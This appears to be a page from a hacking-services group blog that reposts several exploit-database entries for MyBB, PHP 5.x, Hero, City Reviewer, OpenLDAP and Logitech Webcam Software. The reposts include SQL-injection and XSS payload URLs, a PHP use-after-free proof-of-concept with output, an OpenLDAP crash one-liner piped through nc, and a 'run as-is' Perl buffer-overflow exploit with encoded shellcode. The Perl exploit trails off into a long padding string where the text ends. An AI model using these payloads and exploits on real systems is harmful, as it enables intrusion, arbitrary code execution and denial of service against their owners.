Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863158206

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/57009/info

The Transactions Plugin for MyBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Transactions 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com//bank.php?transactions=[SQLi]
HireHackking 
Yet Another Use After Free Vulnerability in unserialize() with SplObjectStorage

Taoguang Chen <[@chtg](http://github.com/chtg)> 
Write Date: 2015.8.27 
Release Date: 2015.9.4

A use-after-free vulnerability was discovered in unserialize() with SplObjectStorage object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.13
Affected is PHP 5.5 < 5.5.29
Affected is PHP 5.4 < 5.4.45

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------


    ALLOC_INIT_ZVAL(pentry);
    if (!php_var_unserialize(&pentry, &p, s + buf_len, &var_hash TSRMLS_CC)) {
      zval_ptr_dtor(&pentry);
      goto outexcept;
    }
    if(Z_TYPE_P(pentry) != IS_OBJECT) {
      goto outexcept;
    }
    ALLOC_INIT_ZVAL(pinf);
    if (*p == ',') { /* new version has inf */
      ++p;
      if (!php_var_unserialize(&pinf, &p, s + buf_len, &var_hash TSRMLS_CC)) {
        zval_ptr_dtor(&pinf);
        goto outexcept;
      }
    }


It has been demonstrated many times before that __wakeup() leads to
ZVAL is freed from memory. However during deserialization will still
allow to use R: or r: to set references to that already freed memory.
It is possible to use-after-free attack and execute arbitrary code
remotely.

Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.


<?php

class obj {
  var $ryat;
  function __wakeup() {
    $this->ryat = 1;
  }
}

$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";

$inner = 'x:i:1;O:8:"stdClass":0:{},i:1;;m:a:0:{}';
$exploit = 'a:5:{i:0;i:1;i:1;C:16:"SplObjectStorage":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;R:6;i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';

$data = unserialize($exploit);

var_dump($data);

function ptr2str($ptr)
{
  $out = '';
  for ($i = 0; $i < 8; $i++) {
    $out .= chr($ptr & 0xff);
    $ptr >>= 8;
  }
  return $out;
}

?>


Test the PoC on the command line:


$ php uafpoc.php
array(5) {
  [0]=>
  int(1)
  [1]=>
  &int(1)
  [2]=>
  object(obj)#3 (1) {
    ["ryat"]=>
    &int(1)
  }
  [3]=>
  int(1122334455)  <===  so we can control the memory and create fake ZVAL :)
  [4]=>
  string(24) "?v?B????"
}
HireHackking 
source: https://www.securityfocus.com/bid/57035/info

Hero is prone to multiple cross-site scripting vulnerabilities and a cross-site request-forgery vulnerability.

An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, disclose or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.

Hero 3.76 is vulnerable; other versions may also be affected. 

http://www.example.com/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d"
HireHackking 
source: https://www.securityfocus.com/bid/57035/info
 
Hero is prone to multiple cross-site scripting vulnerabilities and a cross-site request-forgery vulnerability.
 
An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, disclose or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
 
Hero 3.76 is vulnerable; other versions may also be affected. 

http://www.example.com/hero_os/users/login?errors=true&username=" onmouseover%3dalert(/XSS/) %3d"
HireHackking

City Reviewer - 'search.php' Script SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/57049/info City Reviewer is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/city_reviewer/search.php?category=6
HireHackking

OpenLDAP 2.4.42 - ber_get_next Denial of Service

HACKER · %s · %s

# Exploit Title: OpenLDAP 2.4.42 ber_get_next DOS # Date: 11/09/15 # Exploit Author: Denis Andzakovic - Security-Assessment.com # Vendor Homepage: http://www.openldap.org/ # Software Link: ftp://ftp.openldap.org/pub/OpenLDAP/openldap-release/openldap-2.4.42.tgz # Version: <= 2.4.42 # Tested on: Debian 8 ( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. OpenLDAP get_ber_next Denial of Service Affected Versions: OpenLDAP <= 2.4.42 PDF: http://www.security-assessment.com/files/documents/advisory/OpenLDAP-ber_get_next-Denial-of-Service.pdf +-------------+ | Description | +-------------+ By sending a crafted packet, an attacker may cause the OpenLDAP server to reach an assert() statement, crashing the daemon. This was tested on OpenLDAP 2.4.42 (built with GCC 4.9.2) and OpenLDAP 2.4.40 installed from the Debian package repository. +--------------+ | Exploitation | +--------------+ By sending a crafted packet, an attacker can cause the OpenLDAP daemon to crash with a SIGABRT. This is due to an assert() call within the ber_get_next method (io.c line 682) that is hit when decoding tampered BER data. The following proof of concept exploit can be used to trigger the condition: --[ Exploit POC echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389 The above causes slapd to abort as follows when running with '-d3', however it should be noted that this will crash the server even when running in daemon mode. --[ sladp -d3 55f0b36e slap_listener_activate(7): 55f0b36e >>> slap_listener(ldap:///) 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 ber_get_next ldap_read: want=8, got=8 0000: ff 84 84 84 84 84 77 83 ......w. 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 ber_get_next ldap_read: want=1, got=1 0000: 0a . 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 ber_get_next slapd: io.c:682: ber_get_next: Assertion `0' failed. The following GDB back trace provides further information as to the location of the issue. --[ back trace program received signal SIGABRT, Aborted. [Switching to Thread 0x7ffff2e4a700 (LWP 1371)] 0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 #1 0x00007ffff6a144e8 in __GI_abort () at abort.c:89 #2 0x00007ffff6a0c226 in __assert_fail_base (fmt=0x7ffff6b42ce8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:92 #3 0x00007ffff6a0c2d2 in __GI___assert_fail (assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:101 #4 0x000000000053261a in ber_get_next (sb=0x7fffe40008c0, len=0x7ffff2e49b40, ber=0x7fffe4000a00) at io.c:682 #5 0x0000000000420b56 in connection_input (cri=<optimized out>, conn=<optimized out>) at connection.c:1572 #6 connection_read (cri=<optimized out>, s=<optimized out>) at connection.c:1460 #7 connection_read_thread (ctx=0x7ffff2e49b90, argv=0xf) at connection.c:1284 #8 0x000000000050c871 in ldap_int_thread_pool_wrapper (xpool=0x8956c0) at tpool.c:696 #9 0x00007ffff6d8f0a4 in start_thread (arg=0x7ffff2e4a700) at pthread_create.c:309 #10 0x00007ffff6ac404d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111 +----------+ | Solution | +----------+ This issue has been resolved by commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629 in git://git.openldap.org/openldap.git +----------+ | Timeline | +----------+ 10/09/15 - Issue raised on OpenLDAP issue tracker, marked as a ‘minor’ security issue, as per the requirements in the ITS, making the issue public. 10/09/15 - Patch pushed to OpenLDAP master branch by Howard Chu, commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629 10/09/15 - Release of this advisory document. +-------------------------------+ | About Security-Assessment.com | +-------------------------------+ Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. For further information on this issue or any of our service offerings, contact us: Web www.security-assessment.com Email info () security-assessment com Phone +64 4 470 1650
HireHackking
#************************************************************************************************************* # # Title: Logitech Webcam Software 1.1 eReg.exe SEH/Unicode Buffer Overflow # Date: 9-10-2015 # Target tested: Windows 7 (x64) # Software Link: http://www.logitech.com/pub/techsupport/quickcam/lws110_x64.exe # Author: Robbie Corley # Contact: c0d3rc0rl3y@gmail.com # Website: # CVE: # Category: Local # # Description: # The Webcam Logitech registration .ini file is vulnerable to a unicode SEH based buffer overflow. # # Instructions: # Run this as-is. I've made it simple enough to write the new "eReg.ini" file # to the program files directory and open the vulerable application for you. # You can also comment out the "system()" command and run the "eReg.exe" program manually; it's up to you. # You will be presented with the calculator.exe program and the app will crash # due to an intentional int 3 breakpoint added to conserve shellcode bytes. # #************************************************************************************************************** print "running...you should see the calculator in a second or two..."; my $everything= "[Family_Name] Family=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAabfJXB-BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBPPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBNQHRwBLpqTtKJrtKnrLLdKpRKl8kkPbkMrzhTKPro0dKN2cPQnjlLsRUkBXkKP1yhG9sd8OLTKOg1hIqGRDKCJKp9q6gnQZMZKIp4KNTvOKQy6PE3QMnQG1YRNQ5puL2rkRZkt9qvgc6BkNLROTKrZmLM1uwtKSLdoKLkQxGJKJoOkp1Ep20R33YIkkO9CxMzcxMKSfmKSxhxlKOKOKOQS1QPlqSNNqUSHaUypKPAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB